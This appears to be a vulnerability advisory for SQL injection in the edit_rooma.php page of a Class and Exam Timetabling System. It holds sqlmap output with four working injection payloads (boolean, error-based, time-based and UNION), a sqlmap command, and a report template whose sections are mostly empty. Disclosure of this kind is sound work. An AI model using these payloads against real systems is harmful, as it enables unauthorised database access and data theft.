---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=148' AND 2577=2577 AND 'LATC'='LATC
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=148' OR (SELECT 4845 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(4845=4845,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'GMyB'='GMyB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=148' AND (SELECT 8511 FROM (SELECT(SLEEP(5)))xTOO) AND 'IBzq'='IBzq
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-4558' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171786b71,0x797652614151556c62464e4d6f48766e68696e77447676677478627868694945647a4f4f45527257,0x71786b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
python sqlmap.py -r 1.txt --batch --dbs
sourcecodester Class and Exam Timetabling System Project V1.0 /edit_rooma.php SQL injection
NAME OF AFFECTED PRODUCT(S)
Class and Exam Timetabling System
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability lonameion:
Payload:
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
Suggested repair